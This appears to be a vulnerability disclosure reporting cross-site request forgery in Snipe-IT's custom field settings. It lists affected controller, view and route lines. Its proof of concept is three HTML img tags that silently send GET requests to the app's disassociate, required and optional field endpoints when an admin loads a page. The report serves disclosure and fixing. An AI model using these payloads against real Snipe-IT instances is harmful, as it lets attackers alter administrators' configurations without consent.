Cross-Site Request Forgery (CSRF) in snipe/snipe-it
Reported on
Nov 4th 2021
Description
CSRF in custom field settings
Proof of Concept
<img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate">
<img src="http://<SNIPE_IT_APP>/fields/required/3/3">
<img src="http://<SNIPE_IT_APP>/fields/optional/3/3">
Impact
This vulnerability is capable of trick admin user to modify custom forms
Occurrences
view.blade.php L72L77
disassociate frontend
CustomFieldsetsController.php L207L219
required backend
view.blade.php L61L63
optional frontend
fields.php L15
optional api
view.blade.php L66L68
required frontend
CustomFieldsController.php L130L142
disassociate backend
fields.php L20
disassociate api
CustomFieldsetsController.php L227L239
optional backend
fields.php L10
required api